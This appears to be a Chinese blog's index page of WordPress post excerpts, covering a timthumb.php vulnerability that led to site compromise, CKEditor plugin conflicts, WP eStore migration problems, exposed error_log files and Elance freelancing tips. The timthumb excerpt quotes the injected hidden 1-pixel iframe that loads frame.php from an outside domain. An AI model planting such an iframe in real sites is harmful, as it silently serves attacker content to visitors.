WordPress

timthumb漏洞导致iframe攻击,wp-settings.php被修改

wordpress主题中一个很常用的处理图片的工具timthumb.php因为远程存储文件时候的验证上不足而产生了漏洞,允许在cache文件夹中执行一些php脚本,这已经不是什么秘密,可我就是中了招。 某天打开网站,发现服务器上所有的wordpress网站在firefox中都会打开一个弹出窗口,提示下载frame.php,这应该不是代码本意,不知道我的firefox出了啥问题,其实是在源代码里多了隐藏的iframe,用firebug查看源代码,可以看到下面的内容

<iframe id="iframe" src="%20http://counter-wordpress.com/frame.php" style="width: 1px; height: 1px;">

Read More
生活琐记

CKEditor再次更新

上次谈到新版ckeditor for wordpress插件与导致woo themes的主题选项无法使用。今天突然发现CKEditor for WordPress 又发布了一个更新,装上后发现wordPress 控制板里的快速发布不再被ckeditor替换,这算是一大进步,可是仍然与我装的woo themes主题冲突。虽然更新了但不打算立刻换,不然辛苦定制的表情又要没了,每次更新ckeditor的核心文件都会被完全替换,没办法保存定制化的更改,例如定制化的ckeditor smiley表情

Read More
WordPress

WP eStore移植后数据全部丢失

今天折腾的WP网站装了个收费的ecommerce插件,叫WP eStore,说实话感觉这个插件并不比免费的强大多少,还是很多人买。按照移植WordPress的方法折腾完,看起来很不错一切都没问题,访问到Store页面的时候,问题来了,eStore的shortcode报错,说指定的id不存在咋回事。

Read More
WordPress

wordpress禁止从web访问error_log

今天心血来潮访问了下error_log,惊奇的发现自己博客的error_log从web就被轻松访问了,随即翻了翻别人的网站,在各个域名后面加error_log。有的提示404错误,有的提示无权访问error_log,有的就和我的差不多把主机信息都透露了。。。

Read More
Elance

Elance Tips: Top 5 Projects You Should Run Away From

网上看到的,留着备用

Like I said before, if you want to win the good projects on Elance and make some real money (not just for peanuts), the first thing you need to know is how to choose your battles. Just bid on projects worth bidding on, or at least can turn into a project worth bidding on (some buyers don’t know how to come up with a useful brief, but sometimes you can help).

Read More